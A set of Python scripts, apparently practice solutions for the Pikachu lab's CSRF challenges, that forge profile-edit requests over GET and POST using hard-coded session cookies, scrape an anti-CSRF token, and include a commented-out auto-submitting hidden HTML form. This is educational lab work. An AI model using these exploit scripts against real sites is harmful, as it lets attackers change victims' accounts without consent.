#与get相似,只是修改了一些请求方式
#这个漏洞产生的验证就是token实时验证,以及前端存在的Cookie验证,需要验证两个
自编CSRF(GET)
import requests
from urllib.parse import urlencode
# Pikachu "CSRF(get)" lab: the profile-edit endpoint takes its form fields
# as GET query parameters, so a single URL carries the whole state change.
target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php"
check_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get.php"  # profile page, read back afterwards

# Fields the edit endpoint expects. `add` carries a marker string that is
# searched for in the profile page to confirm the write went through.
payload = dict(
    sex="girl",
    phonenum="123456",
    add="CSRF执行成功",
    email="123.COM",
    submit="submit",
)

# urlencode() turns the dict into a query string so it can be joined to the
# URL as str + str; this is the link the lab scenario has the victim open.
alert_target = f"{target_url}?{urlencode(payload)}"
print(f"需要发送给用户的链接为:{alert_target}")

# Simulate the victim's browser: the lab session cookie stands in for the
# cookie a browser would attach to the request on its own.
headers = {"Cookie": "PHPSESSID=df0u2o787mgfgc0avf392ksd7g"}

# The same fields go out as `params`; requests builds the query string
# itself, which should come out identical to alert_target.
requests.get(target_url, params=payload, headers=headers)

# Read the profile back with the same session and look for the marker.
resp = requests.get(check_url, headers=headers)
print("[+] 注入完成 ")
print("[+] 检查注入是否成功: ", "CSRF执行成功" in resp.text)
CSRF(POST)
#与get相似,只是修改了一些请求方式
import requests
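# Pikachu "CSRF(post)" lab: same flow as the GET variant, except the edit
# endpoint reads its fields from a POST body, so the script posts them
# directly while presenting the lab session cookie.
target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php"
get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post.php"  # profile page, read back afterwards

# Fields the edit endpoint expects.
payload = {
    "sex": "girl",
    "phonenum": "123456",
    "add": "CSRF的POST攻击",
    "email": "qq.com",
    "submit": "submit",
}

# Simulate the victim's browser: the lab session cookie stands in for the
# cookie a browser would attach on its own. No requests.Session() is needed
# here (the original created one and never used it) because the cookie is
# passed explicitly on every call.
headers = {"Cookie": "PHPSESSID=49mmcmofpdtoh0vn7jvkoj13r2"}

requests.post(target_url, data=payload, headers=headers)

# Read the profile back with the same session.
resp = requests.get(get_url, headers=headers)
print("[+] 攻击完成 ")

# NOTE(review): the success marker is the phone number, which is the same
# value the sibling labs write and so may already be on the page from an
# earlier run; the `add` marker would be a firmer check. Kept as the phone
# number so the printed result matches the original script.
if payload["phonenum"] in resp.text:
    print("[+] 查看是否注入成功! ")
else:
    print("[-] 注入失败 !")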
CSRF(token)
#这个漏洞产生的验证就是token实时验证,以及前端存在的Cookie验证,需要验证两个
"""
get构造
# 拼接成可攻击的URL
evil_url = target_url + "?" + urlencode(payload)
payload = target_url + "?" + urlencode(payload)
"""
import requests
import re
# target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php"
#
# payload = {
# "sex":"girl",
# "phonenum":"123456",
# "add":"CSRF-token",
# "email":"321@qq.com",
# "submit":"submit"
# }
#
# html = '''
# <form action="http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
# <input type="hidden" name="sex" value="girl">
# <input type="hidden" name="phonenum" value="123456">
# <input type="hidden" name="add" value="CSRF-POST">
# <input type="hidden" name="email" value="123@qq.com">
# <input type="hidden" name="submit" value="submit">
# </form>
# <script>document.forms[0].submit()</script>
# '''
#
# with open("CSRF_token.html","w",encoding = "utf-8") as f:
# f.write(html)
#
# print("[+] 攻击脚本已写好CSRF_token.html")
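# Pikachu "CSRF(token)" lab. The edit form embeds a hidden `token` field, so
# a submission must present a token that matches the server's session state.
#
# NOTE(review): this script obtains the token by loading the edit form with
# the victim's own PHPSESSID (the same Cookie header is sent on every call
# below). That is an authenticated replay from inside the victim's session,
# not a request from another origin; a genuinely cross-site attacker cannot
# read that form or its token (absent some other flaw), which is exactly what
# the token check relies on. A "successful" run here shows the token is
# enforced, not that it is bypassable.
target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php"
get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get.php"

session = requests.Session()
# Explicit session cookie. The Session object will also collect any cookies
# the server sets; presumably the explicit Cookie header takes precedence
# over those — verify against the requests version in use.
headers = {"Cookie": "PHPSESSID=if9t2mbpc5c5rf83p1slcn7748"}

# Load the profile page, then the edit form that carries the token.
session.get(get_url, headers=headers)
target_get = session.get(url=target_url, headers=headers)

# The token is a hidden input on the edit form. Guard the match: the original
# called .group(1) directly and died with an AttributeError whenever the form
# was absent (e.g. an expired or wrong PHPSESSID), which hid the real cause.
token_match = re.search(r'name="token" value="(.*?)"', target_get.text)
if token_match is None:
    raise SystemExit("[-] 页面中未找到 token,请检查 PHPSESSID 是否有效")
token = token_match.group(1)
print(f"[+] 已获取实时Token:{token}")

# Fields the edit endpoint expects, plus the token just read.
payload = {
    "sex": "girl",
    "phonenum": "123456",
    "add": "CSRF-token",
    "email": "321@qq.com",
    "token": token,
    "submit": "submit",
}

session.post(url=target_url, data=payload, headers=headers)
# This bare GET of the edit endpoint sends no data and its response is not
# used; its purpose is unclear (looks like a leftover) — kept so the request
# sequence matches the original.
session.get(target_url, headers=headers)

# Read the profile back and look for the marker.
resp = session.get(url=get_url, headers=headers)
print("[+] 注入成功")
print("[+] 检查测是否正常注入: ", "CSRF-token" in resp.text)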